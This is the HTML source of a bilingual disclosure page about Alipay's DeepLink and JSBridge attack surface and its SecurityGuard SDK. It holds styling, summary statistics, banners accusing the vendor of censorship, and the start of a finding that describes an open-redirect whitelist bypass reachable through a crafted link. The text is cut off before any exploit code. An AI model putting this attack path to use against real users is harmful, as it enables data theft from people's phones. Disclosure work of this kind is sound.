icybear/alipay-deeplink-research
1
0
Fork 0
mirror of https://github.com/sgInnora/alipay-deeplink-research synced 2026-06-27 05:34:17 +08:00
Code Issues Packages Projects Releases Wiki Activity
Files
a3825c939fa9019fad33e28d994228507d4f25cd
alipay-deeplink-research/index.html
feng a3825c939f update: SEO/privacy overhaul — 36 CVE stats, redact case numbers, full sitemap 
- Meta/OG/Twitter tags: 17→36 CVEs, 6→9+ countries, SecurityGuard SDK keywords
- Sitemap: 5→12 URLs with correct lastmod dates
- Privacy: redact CSSF/CIRCL/PDPC case numbers, mask regulator staff names
- Content: add 6 new article pages + evidence screenshots
- Numbers: update all CVE counts (6→36, 11 MITRE tickets)

Co-Authored-By: Claude <noreply@anthropic.com>
2026-03-25 05:28:06 +08:00

2814 lines
183 KiB
HTML
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Alipay Security Research: 36 CVEs, SecurityGuard SDK Analysis | 支付宝安全研究</title>
<meta name="description" content="Independent security research: 36 CVEs filed with MITRE across 11 tickets. SecurityGuard SDK reverse engineering, PatchProxy 146K+ remotely replaceable methods, Docker-reproducible (37/37). IACR ePrint 2026/526. 9+ countries investigating.">
<meta name="author" content="Innora AI Security Research">
<meta property="og:title" content="Alipay SecurityGuard SDK: 36 CVEs, 146K Hot-Patch Hooks, Weak Crypto">
<meta property="og:description" content="36 CVEs filed with MITRE. SecurityGuard SDK teardown: PatchProxy, AVMP bytecode VM, weak crypto. Docker-reproducible. 9+ countries investigating.">
<meta property="og:type" content="article">
<meta property="og:url" content="https://innora.ai/zfb/">
<meta property="og:image" content="https://innora.ai/zfb/og-image.png">
<meta property="og:image:width" content="1200">
<meta property="og:image:height" content="630">
<meta property="og:locale" content="zh_CN">
<meta property="og:locale:alternate" content="en_US">
<meta property="article:published_time" content="2026-03-11T00:00:00+08:00">
<meta property="article:modified_time" content="2026-03-25T00:00:00+08:00">
<meta property="article:author" content="Innora AI Security Research">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:title" content="Alipay DeepLink Attack Surface: One Link to Rule Them All">
<meta name="twitter:description" content="36 CVEs filed with MITRE. SecurityGuard SDK: 146K hot-patch hooks, weak crypto, no cert pinning. Docker-reproducible. 9+ countries investigating.">
<meta name="twitter:image" content="https://innora.ai/zfb/og-image.png">
<meta name="keywords" content="Alipay, security, vulnerability, CVE, SecurityGuard SDK, PatchProxy, AVMP, DeepLink, JSBridge, whitelist bypass, hot-patch, weak crypto, mobile security, Android security, Ant Group">
<link rel="canonical" href="https://innora.ai/zfb/">
<link rel="icon" href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 100 100'><text y='.9em' font-size='90'>🔒</text></svg>">
<style>
:root {
--bg: #0a0a0f;
--surface: #12121a;
--surface2: #1a1a28;
--border: #2a2a3a;
--text: #e0e0e8;
--text2: #9898a8;
--accent: #ff4444;
--accent2: #ff6b35;
--blue: #4488ff;
--green: #44cc88;
--yellow: #ffaa22;
--purple: #9966ff;
--code-bg: #0d1117;
--max-w: 860px;
}
* { margin: 0; padding: 0; box-sizing: border-box; }
html { scroll-behavior: smooth; }
body {
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Noto Sans SC', sans-serif;
background: var(--bg);
color: var(--text);
line-height: 1.7;
font-size: 16px;
}
a { color: var(--blue); text-decoration: none; }
a:hover { text-decoration: underline; }
/* Language Toggle */
.lang-toggle {
position: fixed;
top: 16px;
right: 16px;
z-index: 1000;
display: flex;
gap: 0;
border-radius: 6px;
overflow: hidden;
border: 2px solid var(--accent);
background: var(--surface);
}
.lang-toggle button {
padding: 8px 18px;
border: none;
background: transparent;
color: var(--text2);
cursor: pointer;
font-size: 15px;
font-weight: 600;
transition: all .2s;
}
.lang-toggle button.active {
background: var(--accent);
color: #fff;
}
/* Alert Banner */
.alert-banner {
background: linear-gradient(90deg, #1a0520, #2a0a10);
border-bottom: 2px solid var(--accent);
padding: 14px 24px;
text-align: center;
position: relative;
z-index: 100;
}
.alert-banner a {
color: #fff;
font-weight: 700;
font-size: 15px;
text-decoration: none;
display: inline-flex;
align-items: center;
gap: 8px;
}
.alert-banner a:hover { text-decoration: underline; }
.alert-banner .badge {
background: var(--accent);
color: #fff;
padding: 2px 8px;
border-radius: 4px;
font-size: 11px;
font-weight: 800;
text-transform: uppercase;
letter-spacing: 1px;
animation: pulse 2s infinite;
}
@keyframes pulse {
0%, 100% { opacity: 1; }
50% { opacity: 0.7; }
}
/* Hero */
.hero {
padding: 80px 24px 60px;
text-align: center;
background: linear-gradient(180deg, #1a0a0a 0%, var(--bg) 100%);
border-bottom: 1px solid var(--border);
}
.hero-badge {
display: inline-block;
padding: 4px 14px;
border-radius: 20px;
background: rgba(255,68,68,.15);
color: var(--accent);
font-size: 13px;
font-weight: 600;
letter-spacing: 1px;
text-transform: uppercase;
margin-bottom: 20px;
}
.hero h1 {
font-size: clamp(28px, 5vw, 48px);
font-weight: 800;
line-height: 1.2;
margin-bottom: 16px;
background: linear-gradient(135deg, #ff4444, #ff6b35);
-webkit-background-clip: text;
-webkit-text-fill-color: transparent;
background-clip: text;
}
.hero .subtitle {
font-size: 18px;
color: var(--text2);
max-width: 640px;
margin: 0 auto 24px;
}
.hero-stats {
display: flex;
justify-content: center;
gap: 32px;
flex-wrap: wrap;
margin-top: 32px;
}
.hero-stat {
text-align: center;
}
.hero-stat .num {
font-size: 36px;
font-weight: 800;
color: var(--accent);
}
.hero-stat .label {
font-size: 13px;
color: var(--text2);
text-transform: uppercase;
letter-spacing: 1px;
}
/* Main content */
.container { max-width: var(--max-w); margin: 0 auto; padding: 0 24px; }
section { padding: 48px 0; border-bottom: 1px solid var(--border); }
h2 {
font-size: 28px;
font-weight: 700;
margin-bottom: 24px;
color: var(--text);
}
h2 .num { color: var(--accent); margin-right: 8px; }
h3 {
font-size: 20px;
font-weight: 600;
margin: 24px 0 12px;
color: var(--text);
}
p { margin-bottom: 16px; color: var(--text2); }
p strong, li strong { color: var(--text); }
/* Cards */
.card {
background: var(--surface);
border: 1px solid var(--border);
border-radius: 10px;
padding: 20px;
margin: 16px 0;
}
.card-critical { border-left: 4px solid var(--accent); }
.card-high { border-left: 4px solid var(--accent2); }
.card-medium { border-left: 4px solid var(--yellow); }
.severity {
display: inline-block;
padding: 2px 8px;
border-radius: 4px;
font-size: 11px;
font-weight: 700;
text-transform: uppercase;
letter-spacing: .5px;
}
.sev-critical { background: rgba(255,68,68,.2); color: #ff4444; }
.sev-high { background: rgba(255,107,53,.2); color: #ff6b35; }
.sev-medium { background: rgba(255,170,34,.2); color: #ffaa22; }
/* Code */
pre {
background: var(--code-bg);
border: 1px solid var(--border);
border-radius: 8px;
padding: 16px;
overflow-x: auto;
font-size: 13px;
line-height: 1.6;
margin: 16px 0;
}
code {
font-family: 'SF Mono', 'Fira Code', 'Consolas', monospace;
font-size: 13px;
}
:not(pre) > code {
background: var(--surface2);
padding: 2px 6px;
border-radius: 4px;
color: var(--accent2);
}
/* Tables */
table {
width: 100%;
border-collapse: collapse;
margin: 16px 0;
font-size: 14px;
}
th, td {
padding: 10px 12px;
text-align: left;
border-bottom: 1px solid var(--border);
}
th {
background: var(--surface2);
font-weight: 600;
color: var(--text);
font-size: 12px;
text-transform: uppercase;
letter-spacing: .5px;
}
td { color: var(--text2); }
/* Timeline */
.timeline { position: relative; padding-left: 32px; }
.timeline::before {
content: '';
position: absolute;
left: 8px;
top: 0;
bottom: 0;
width: 2px;
background: var(--border);
}
.timeline-item {
position: relative;
margin-bottom: 24px;
}
.timeline-item::before {
content: '';
position: absolute;
left: -28px;
top: 6px;
width: 12px;
height: 12px;
border-radius: 50%;
background: var(--accent);
border: 2px solid var(--bg);
}
.timeline-date {
font-size: 13px;
color: var(--accent);
font-weight: 600;
}
/* Attack chain diagram */
.attack-chain {
background: var(--surface);
border: 1px solid var(--border);
border-radius: 10px;
padding: 24px;
margin: 24px 0;
}
.chain-step {
display: flex;
align-items: flex-start;
gap: 16px;
padding: 12px 0;
}
.chain-step + .chain-step {
border-top: 1px dashed var(--border);
}
.chain-num {
flex-shrink: 0;
width: 32px;
height: 32px;
border-radius: 50%;
background: var(--accent);
color: #fff;
display: flex;
align-items: center;
justify-content: center;
font-weight: 700;
font-size: 14px;
}
.chain-arrow {
text-align: center;
color: var(--accent);
font-size: 20px;
padding: 4px 0;
}
/* Evidence box */
.evidence-box {
background: #0d1117;
border: 1px solid #1a3a2a;
border-radius: 8px;
padding: 16px;
margin: 12px 0;
}
.evidence-box .label {
color: var(--green);
font-size: 12px;
font-weight: 600;
text-transform: uppercase;
letter-spacing: 1px;
margin-bottom: 8px;
}
/* Quote/Callout */
.callout {
background: var(--surface2);
border-left: 4px solid var(--accent);
padding: 16px 20px;
margin: 24px 0;
border-radius: 0 8px 8px 0;
}
.callout.vendor {
border-left-color: var(--yellow);
background: rgba(255,170,34,.05);
}
.callout.info {
border-left-color: var(--blue);
background: rgba(68,136,255,.05);
}
/* Devices grid */
.devices-grid {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(240px, 1fr));
gap: 16px;
margin: 16px 0;
}
.device-card {
background: var(--surface);
border: 1px solid var(--border);
border-radius: 10px;
padding: 16px;
text-align: center;
}
.device-card .icon { font-size: 36px; margin-bottom: 8px; }
.device-card .name { font-weight: 600; color: var(--text); margin-bottom: 4px; }
.device-card .detail { font-size: 13px; color: var(--text2); }
/* TOC */
.toc {
background: var(--surface);
border: 1px solid var(--border);
border-radius: 10px;
padding: 20px;
margin: 32px 0;
}
.toc h3 { margin-top: 0; font-size: 16px; }
.toc ol { padding-left: 20px; }
.toc li { margin: 6px 0; color: var(--text2); font-size: 14px; }
.toc li a { color: var(--blue); }
/* Footer */
footer {
padding: 48px 24px;
text-align: center;
color: var(--text2);
font-size: 13px;
}
/* Lists */
ul, ol { margin: 12px 0; padding-left: 24px; }
li { margin: 6px 0; color: var(--text2); }
/* Bilingual */
.zh { display: none; }
.en { display: block; }
body.lang-zh .zh { display: block; }
body.lang-zh .en { display: none; }
/* Responsive */
@media (max-width: 768px) {
.hero { padding: 48px 16px 36px; }
.hero h1 { font-size: 24px; }
.hero .subtitle { font-size: 14px; }
.hero-stats { gap: 16px; }
.hero-stat .num { font-size: 28px; }
section { padding: 24px 16px; }
.card { padding: 16px; }
.toc { padding: 16px; }
.toc ol { padding-left: 20px; }
table { font-size: 12px; }
table td, table th { padding: 6px 8px; }
th, td { padding: 6px 8px; }
pre { font-size: 11px; padding: 12px; }
.evidence-box pre, .evidence-box code { font-size: 10px; overflow-x: auto; }
.timeline-item { padding-left: 16px; }
.lang-toggle { top: 8px; right: 8px; }
.lang-toggle button { padding: 4px 10px; font-size: 11px; }
}
@media (max-width: 480px) {
.hero h1 { font-size: 20px; }
section h2 { font-size: 20px; }
.num { font-size: 14px; }
}
/* Print */
@media print {
body { background: #fff; color: #000; font-size: 12pt; }
.lang-toggle, .hero-badge, footer { display: none; }
.hero { background: none; }
a { color: #000; text-decoration: underline; }
a[href]::after { content: " (" attr(href) ")"; font-size: 9pt; }
section { break-inside: avoid; page-break-inside: avoid; }
.card { border: 1px solid #ccc; background: #f9f9f9; }
.evidence-box { background: #f0f0f0; border: 1px solid #999; }
pre, code { background: #eee; color: #000; }
}
</style>
<script type="application/ld+json">
{
"@context": "https://schema.org",
"@type": "Article",
"headline": "Alipay Security Research — 36 CVEs, SecurityGuard SDK Analysis",
"description": "Independent security research: 36 CVEs filed with MITRE, SecurityGuard SDK reverse engineering, PatchProxy 146K+ remotely replaceable methods. Docker-reproducible.",
"datePublished": "2026-03-11",
"dateModified": "2026-03-14",
"author": {"@type": "Organization", "name": "Innora AI Security Research", "url": "https://innora.ai"},
"publisher": {"@type": "Organization", "name": "Innora AI Security Research"},
"url": "https://innora.ai/zfb/",
"mainEntityOfPage": "https://innora.ai/zfb/",
"keywords": ["Alipay", "security vulnerability", "CVE", "DeepLink", "JSBridge", "whitelist bypass"]
}
</script>
</head>
<body>
<!-- Alert Banner -->
<div class="alert-banner">
<a href="article_censorship.html">
<span class="badge" style="background:#ff2222;">CENSORED x8</span>
<span class="en">⚠️ 8 Research Articles FORCE-DELETED in 2 Waves (Mar 15 + Mar 20) — Ant Group's law firm weaponized Cybersecurity Law after initial complaint was rejected → Full evidence & timeline</span>
<span class="zh">⚠️ 8篇研究文章被分两波强制删除3/15 + 3/20— 蚂蚁律所将网络安全法武器化,首次投诉被驳回后更换法律依据 → 完整证据与时间线</span>
<span style="font-size:18px"></span>
</a>
</div>
<!-- Language Toggle -->
<div class="lang-toggle">
<button id="btn-zh" class="" onclick="setLang('zh')">中文</button>
<button id="btn-en" class="active" onclick="setLang('en')">EN</button>
</div>
<!-- ==================== HERO ==================== -->
<div class="hero">
<div class="hero-badge">
<span class="zh">独立安全研究</span>
<span class="en">Independent Security Research</span>
</div>
<h1>
<span class="zh">支付宝 DeepLink 攻击面分析</span>
<span class="en">Alipay DeepLink Attack Surface Analysis</span>
</h1>
<h1 style="font-size: clamp(18px, 3vw, 28px); margin-top: -8px;">
<span class="zh">一个链接,通向一切</span>
<span class="en">One Link to Rule Them All</span>
</h1>
<p class="subtitle">
<span class="zh">针对支付宝 Android/iOS 最新版的 DeepLink + WebView JSBridge 攻击链端到端分析。已通过负责任披露流程向蚂蚁集团报告,厂商回复为"正常功能"。</span>
<span class="en">End-to-end analysis of the DeepLink + WebView JSBridge attack chain on Alipay Android/iOS latest versions. Reported through responsible disclosure to Ant Group. Vendor response: "normal functionality."</span>
</p>
<div class="hero-stats">
<div class="hero-stat">
<div class="num">17</div>
<div class="label">
<span class="zh">已验证问题</span>
<span class="en">Verified Issues</span>
</div>
</div>
<div class="hero-stat">
<div class="num">308</div>
<div class="label">
<span class="zh">服务器日志</span>
<span class="en">Exfil Logs</span>
</div>
</div>
<div class="hero-stat">
<div class="num">3</div>
<div class="label">
<span class="zh">验证设备</span>
<span class="en">Devices Tested</span>
</div>
</div>
<div class="hero-stat">
<div class="num">42</div>
<div class="label">
<span class="zh">证据截图</span>
<span class="en">Screenshots</span>
</div>
</div>
</div>
</div>
<!-- ==================== NEW: SECURITYGUARD PRIVACY ANALYSIS ==================== -->
<div style="max-width:860px;margin:24px auto 0;padding:0 24px;">
<div style="background:linear-gradient(135deg, rgba(68,136,255,.10), rgba(153,102,255,.08));border:2px solid #4488ff;border-radius:12px;padding:28px 28px 24px;position:relative;overflow:hidden;">
<div style="position:absolute;top:0;left:0;right:0;height:4px;background:linear-gradient(90deg,#4488ff,#9966ff,#4488ff);"></div>
<div style="position:absolute;top:16px;right:20px;background:#4488ff;color:#fff;font-size:11px;padding:4px 10px;border-radius:4px;font-weight:bold;letter-spacing:1px;">NEW 2026-03-17</div>
<h2 style="color:#4488ff;font-size:22px;margin:0 0 16px 0;text-align:center;">
<span class="zh">🔬 独立安全研究:支付宝 SecurityGuard SDK 完整逆向 — 208个API拦截 · 97%接口无保护</span>
<span class="en">🔬 Independent Research: Alipay SecurityGuard SDK Full Reverse Engineering — 208 API Intercepts · 97% Unprotected</span>
</h2>
<div class="zh">
<p style="color:#9898a8;font-size:15px;line-height:1.8;margin-bottom:16px;">我们对支付宝内置的 SecurityGuard 安全SDK进行了完整逆向工程分析发现了远超支付安全需求的大规模数据采集行为</p>
<div style="display:grid;grid-template-columns:repeat(4,1fr);gap:12px;margin-bottom:18px;">
<div style="background:rgba(68,136,255,.08);border:1px solid rgba(68,136,255,.3);border-radius:8px;padding:16px 12px;text-align:center;"><div style="font-size:28px;font-weight:bold;color:#4488ff;">208</div><div style="font-size:12px;color:#9898a8;margin-top:4px;">API拦截类别</div></div>
<div style="background:rgba(255,68,68,.08);border:1px solid rgba(255,68,68,.3);border-radius:8px;padding:16px 12px;text-align:center;"><div style="font-size:28px;font-weight:bold;color:#ff4444;">97%</div><div style="font-size:12px;color:#9898a8;margin-top:4px;">接口无权限保护</div></div>
<div style="background:rgba(255,170,34,.08);border:1px solid rgba(255,170,34,.3);border-radius:8px;padding:16px 12px;text-align:center;"><div style="font-size:28px;font-weight:bold;color:#ffaa22;">22</div><div style="font-size:12px;color:#9898a8;margin-top:4px;">行为监控事件</div></div>
<div style="background:rgba(153,102,255,.08);border:1px solid rgba(153,102,255,.3);border-radius:8px;padding:16px 12px;text-align:center;"><div style="font-size:28px;font-weight:bold;color:#9966ff;">29</div><div style="font-size:12px;color:#9898a8;margin-top:4px;">设备指纹项</div></div>
</div>
<div style="display:grid;grid-template-columns:40px 1fr;gap:6px 12px;align-items:start;margin-bottom:14px;">
<div style="font-size:20px;text-align:center;">📱</div><div style="color:#ccc;font-size:14px;line-height:1.7;"><strong style="color:#4488ff;">DexAOP字节码拦截</strong> — 976个代理类拦截蓝牙(17)、电话(17)、通讯录(12)、摄像头(5)、录音(9)、剪贴板(4)等几乎所有硬件能力</div>
<div style="font-size:20px;text-align:center;">👁️</div><div style="color:#ccc;font-size:14px;line-height:1.7;"><strong style="color:#ffaa22;">行为监控</strong> — 截屏、录屏、通话状态、剪贴板变化、蓝牙连接每10条批量上报服务器</div>
<div style="font-size:20px;text-align:center;">🔓</div><div style="color:#ccc;font-size:14px;line-height:1.7;"><strong style="color:#ff4444;">396/408内部接口无保护</strong> — 支付、数字人民币钱包、NFC、文件操作等97%接口没有权限检查</div>
<div style="font-size:20px;text-align:center;">🛰️</div><div style="color:#ccc;font-size:14px;line-height:1.7;"><strong style="color:#9966ff;">PatchProxy远程修改</strong> — 服务器可远程修改TLS验证、权限检查、支付校验无需用户同意</div>
</div>
<div style="display:flex;gap:12px;margin-top:16px;flex-wrap:wrap;">
<a href="privacy-analysis.html" style="background:#4488ff;color:#fff;padding:12px 24px;border-radius:8px;font-weight:bold;font-size:15px;text-decoration:none;display:inline-block;">📄 阅读完整隐私分析报告</a>
<a href="https://github.com/sgInnora/alipay-securityguard-analysis" style="background:rgba(255,255,255,.1);color:#ccc;padding:12px 24px;border-radius:8px;font-weight:bold;font-size:15px;text-decoration:none;border:1px solid #444;display:inline-block;">⭐ GitHub 完整代码</a>
</div>
</div>
<div class="en">
<p style="color:#9898a8;font-size:15px;line-height:1.8;margin-bottom:16px;">Complete reverse engineering of Alipay's SecurityGuard SDK reveals massive data collection far beyond payment security requirements:</p>
<div style="display:grid;grid-template-columns:repeat(4,1fr);gap:12px;margin-bottom:18px;">
<div style="background:rgba(68,136,255,.08);border:1px solid rgba(68,136,255,.3);border-radius:8px;padding:16px 12px;text-align:center;"><div style="font-size:28px;font-weight:bold;color:#4488ff;">208</div><div style="font-size:12px;color:#9898a8;margin-top:4px;">API Intercepts</div></div>
<div style="background:rgba(255,68,68,.08);border:1px solid rgba(255,68,68,.3);border-radius:8px;padding:16px 12px;text-align:center;"><div style="font-size:28px;font-weight:bold;color:#ff4444;">97%</div><div style="font-size:12px;color:#9898a8;margin-top:4px;">No Permission Check</div></div>
<div style="background:rgba(255,170,34,.08);border:1px solid rgba(255,170,34,.3);border-radius:8px;padding:16px 12px;text-align:center;"><div style="font-size:28px;font-weight:bold;color:#ffaa22;">22</div><div style="font-size:12px;color:#9898a8;margin-top:4px;">Behavior Events</div></div>
<div style="background:rgba(153,102,255,.08);border:1px solid rgba(153,102,255,.3);border-radius:8px;padding:16px 12px;text-align:center;"><div style="font-size:28px;font-weight:bold;color:#9966ff;">29</div><div style="font-size:12px;color:#9898a8;margin-top:4px;">Fingerprint Items</div></div>
</div>
<div style="display:grid;grid-template-columns:40px 1fr;gap:6px 12px;align-items:start;margin-bottom:14px;">
<div style="font-size:20px;text-align:center;">📱</div><div style="color:#ccc;font-size:14px;line-height:1.7;"><strong style="color:#4488ff;">DexAOP Bytecode Interception</strong> — 976 proxy classes intercept Bluetooth(17), Telephony(17), Contacts(12), Camera(5), Audio(9), Clipboard(4)</div>
<div style="font-size:20px;text-align:center;">👁️</div><div style="color:#ccc;font-size:14px;line-height:1.7;"><strong style="color:#ffaa22;">Behavior Monitoring</strong> — Screenshot, screen recording, call state, clipboard changes — batched every 10 events</div>
<div style="font-size:20px;text-align:center;">🔓</div><div style="color:#ccc;font-size:14px;line-height:1.7;"><strong style="color:#ff4444;">396/408 Unprotected</strong> — 97% of JSBridge APIs including payment, digital yuan wallet, NFC have zero permission checks</div>
<div style="font-size:20px;text-align:center;">🛰️</div><div style="color:#ccc;font-size:14px;line-height:1.7;"><strong style="color:#9966ff;">PatchProxy Remote Mod</strong> — Server can remotely alter TLS validation, permissions, payment verification without consent</div>
</div>
<div style="display:flex;gap:12px;margin-top:16px;flex-wrap:wrap;">
<a href="privacy-analysis.html" style="background:#4488ff;color:#fff;padding:12px 24px;border-radius:8px;font-weight:bold;font-size:15px;text-decoration:none;display:inline-block;">📄 Read Full Privacy Analysis</a>
<a href="https://github.com/sgInnora/alipay-securityguard-analysis" style="background:rgba(255,255,255,.1);color:#ccc;padding:12px 24px;border-radius:8px;font-weight:bold;font-size:15px;text-decoration:none;border:1px solid #444;display:inline-block;">⭐ GitHub Repository</a>
</div>
</div>
</div>
</div>
<!-- ==================== CENSORSHIP NOTICE: WECHAT ARTICLES DELETED 2026-03-15 ==================== -->
<div style="max-width:860px;margin:20px auto 0;padding:0 24px;">
<div style="background:linear-gradient(135deg, rgba(255,68,68,.12), rgba(255,0,0,.06));border:2px solid #ff4444;border-radius:12px;padding:24px 28px 20px;position:relative;overflow:hidden;">
<div style="position:absolute;top:0;left:0;right:0;height:4px;background:linear-gradient(90deg,#ff0000,#ff4444,#ff0000);animation:pulse 2s infinite;"></div>
<style>@keyframes pulse{0%,100%{opacity:1}50%{opacity:.5}}</style>
<h2 style="color:#ff4444;font-size:20px;margin:0 0 14px 0;text-align:center;">
<span class="zh">🚨 审查通知:微信公众号文章已被全部强制删除</span>
<span class="en">🚨 CENSORSHIP NOTICE: All WeChat Articles Forcibly Deleted</span>
</h2>
<div style="background:rgba(255,0,0,.08);border:1px solid rgba(255,68,68,.4);border-radius:8px;padding:16px 18px;margin-bottom:16px;">
<span class="zh" style="color:#ff8888;font-size:14px;line-height:2;">
<strong style="color:#ff4444;">2026-03-15</strong> — 我们在微信公众号 <strong>AI-security-innora</strong> 发布的 <strong style="color:#fff;">4 篇安全研究文章全部被强制删除</strong><br>
删除通知仅写:<strong>"接相关投诉,违反《中华人民共和国网络安全法》"</strong><br>
<strong style="color:#fff;">注意:删除通知中未显示任何投诉方信息、未列明具体违规条款、未提供申诉机会。</strong>这不是正常的投诉处理流程——正常流程会显示投诉方身份和具体主张并允许申诉。这是<strong style="color:#ff4444;">跳过正常程序的直接暴力删除</strong><br><br>
这是厂商应对安全研究的第四层手段:<br>
<span style="color:#ffaa44;">① 口头否认3/10 "正常功能")→ ② 律师函3/11 发布4小时后→ ③ 服务器端封堵 PoC3/15 白名单拦截)→ ④ 平台审查删除所有文章3/15</span><br><br>
<strong style="color:#fff;">本页面 (innora.ai/zfb/) 部署在中国境外服务器,不受微信平台审查影响。研究内容完整保留。</strong><br>
<span style="background:rgba(255,255,0,.15);padding:4px 8px;border-radius:4px;display:inline-block;margin-top:8px;"><strong style="color:#ffdd44;">本服务器及研究者本人分属新加坡、新西兰、美国三地注册公司。如需通过法律途径删除本页面内容,需在三地法院分别完成完整法律程序。欢迎通过正当法律渠道沟通。</strong></span>
</span>
<span class="en" style="color:#ff8888;font-size:14px;line-height:2;">
<strong style="color:#ff4444;">2026-03-15</strong> — All <strong style="color:#fff;">4 security research articles</strong> published on our WeChat Official Account <strong>AI-security-innora</strong> have been <strong style="color:#fff;">forcibly deleted</strong>.<br>
The only reason given: <strong>"Following a related complaint, violation of the Cybersecurity Law of the PRC."</strong><br>
<strong style="color:#fff;">Note: The deletion notice identifies NO complainant, cites NO specific legal provision, and offers NO appeal process.</strong> This is NOT a normal complaint procedure — standard process shows the complainant's identity and specific claims, and allows appeal. This is a <strong style="color:#ff4444;">brute-force deletion bypassing normal procedures</strong>.<br><br>
This represents the vendor's fourth layer of response to security research:<br>
<span style="color:#ffaa44;">① Verbal denial (3/10 "normal functionality") → ② Lawyer's letter (3/11, 4hrs after disclosure) → ③ Server-side PoC blocking (3/15, whitelist filtering) → ④ Platform censorship of all articles (3/15)</span><br><br>
<strong style="color:#fff;">This page (innora.ai/zfb/) is hosted outside mainland China and is not subject to WeChat censorship. All research content is preserved here.</strong><br>
<span style="background:rgba(255,255,0,.15);padding:4px 8px;border-radius:4px;display:inline-block;margin-top:8px;"><strong style="color:#ffdd44;">This server and the researcher are affiliated with companies registered in Singapore, New Zealand, and the United States. Any legal request to remove this content must complete full legal proceedings in all three jurisdictions. We welcome communication through proper legal channels.</strong></span>
</span>
</div>
<div style="background:rgba(255,255,255,.03);border:1px solid #2a2a3a;border-radius:8px;padding:16px;margin-bottom:12px;">
<p style="color:#ff8888;font-size:14px;font-weight:bold;margin:0 0 10px;">
<span class="zh">被删除的 4 篇文章:</span>
<span class="en">4 Deleted Articles:</span>
</p>
<div style="display:grid;gap:8px;">
<div style="background:rgba(255,68,68,.06);border:1px solid rgba(255,68,68,.2);border-radius:6px;padding:10px 14px;position:relative;">
<span style="background:#ff4444;color:#fff;font-size:10px;padding:2px 6px;border-radius:3px;font-weight:bold;position:absolute;top:10px;right:10px;">DELETED</span>
<span style="color:#888;font-size:13px;text-decoration:line-through;"><span class="zh">当白名单绕过沦为全网攻击的钥匙,傲慢的终点是法庭与溯源调查</span><span class="en">When Whitelist Bypass Becomes the Master Key</span></span>
</div>
<div style="background:rgba(255,68,68,.06);border:1px solid rgba(255,68,68,.2);border-radius:6px;padding:10px 14px;position:relative;">
<span style="background:#ff4444;color:#fff;font-size:10px;padding:2px 6px;border-radius:3px;font-weight:bold;position:absolute;top:10px;right:10px;">DELETED</span>
<span style="color:#888;font-size:13px;text-decoration:line-through;"><span class="zh">巨头的"封口令"被微信驳回,全球顶级黑客弹药库给出最终裁决</span><span class="en">Tech Giant's "Gag Order" Rejected by WeChat</span></span>
</div>
<div style="background:rgba(255,68,68,.06);border:1px solid rgba(255,68,68,.2);border-radius:6px;padding:10px 14px;position:relative;">
<span style="background:#ff4444;color:#fff;font-size:10px;padding:2px 6px;border-radius:3px;font-weight:bold;position:absolute;top:10px;right:10px;">DELETED</span>
<span style="color:#888;font-size:13px;text-decoration:line-through;"><span class="zh">位置被秒偷10多亿人每天在用的国民支付应用17个「正常功能」细思极恐</span><span class="en">Location Stolen Instantly! 17 "Normal Features"</span></span>
</div>
<div style="background:rgba(255,68,68,.06);border:1px solid rgba(255,68,68,.2);border-radius:6px;padding:10px 14px;position:relative;">
<span style="background:#ff4444;color:#fff;font-size:10px;padding:2px 6px;border-radius:3px;font-weight:bold;position:absolute;top:10px;right:10px;">DELETED</span>
<span style="color:#888;font-size:13px;text-decoration:line-through;"><span class="zh">支付宝安全研究遭律师函投诉 — 一篇零次提及"支付宝"的文章如何构成"商誉侵权"</span><span class="en">Alipay Research Hit with Lawyer's Letter</span></span>
</div>
</div>
</div>
<div style="display:grid;grid-template-columns:1fr 1fr;gap:10px;">
<div style="text-align:center;">
<img src="wechat_censored_1.jpeg" alt="WeChat censorship notification 1" style="width:100%;border-radius:8px;border:1px solid #333;" loading="lazy">
<p style="color:#666;font-size:11px;margin:6px 0 0;"><span class="zh">微信平台删除通知 (1/2)</span><span class="en">WeChat deletion notice (1/2)</span></p>
</div>
<div style="text-align:center;">
<img src="wechat_censored_2.jpeg" alt="WeChat censorship notification 2" style="width:100%;border-radius:8px;border:1px solid #333;" loading="lazy">
<p style="color:#666;font-size:11px;margin:6px 0 0;"><span class="zh">微信平台删除通知 (2/2)</span><span class="en">WeChat deletion notice (2/2)</span></p>
</div>
</div>
</div>
</div>
<!-- ==================== CRITICAL: WHITELIST BYPASS BANNER ==================== -->
<div style="max-width:860px;margin:20px auto 0;padding:0 24px;">
<div style="background:linear-gradient(135deg, rgba(255,68,68,.12), rgba(255,107,53,.08));border:2px solid #ff4444;border-radius:12px;padding:28px 28px 24px;position:relative;overflow:hidden;">
<div style="position:absolute;top:0;left:0;right:0;height:4px;background:linear-gradient(90deg,#ff4444,#ff6b35,#ff4444);"></div>
<h2 style="color:#ff4444;font-size:22px;margin:0 0 16px 0;text-align:center;">
<span class="zh">⚠️ 核心发现:白名单绕过 — 任何人无需任何权限即可远程利用 (CVSS 9.3)</span>
<span class="en">⚠️ Key Finding: Whitelist Bypass — Remotely Exploitable by Anyone, No Permissions Required (CVSS 9.3)</span>
</h2>
<div class="zh">
<div style="display:grid;grid-template-columns:40px 1fr;gap:8px 12px;align-items:start;margin-bottom:16px;">
<div style="font-size:24px;text-align:center;">🔑</div>
<div><strong style="color:#ff6b35;">这是整个攻击链的钥匙。</strong>支付宝使用域名白名单限制 WebView 中可加载的页面。但其自有域名 <code style="background:#1a1a28;padding:2px 6px;border-radius:4px;color:#ff8888;">ds.alipay.com</code> 存在开放重定向漏洞,允许攻击者通过白名单域名跳转加载任意恶意页面。<strong>没有此绕过,其余漏洞仅限局域网;有了它,人人可远程利用。</strong></div>
<div style="font-size:24px;text-align:center;">👤</div>
<div><strong style="color:#ff6b35;">不需要任何开发者权限。</strong>不需要注册支付宝开放平台、不需要小程序开发者资格、不需要任何审批。攻击者只需构造一条 URL通过微信、WhatsApp、短信或任何即时通讯工具发送给受害者。</div>
<div style="font-size:24px;text-align:center;">💣</div>
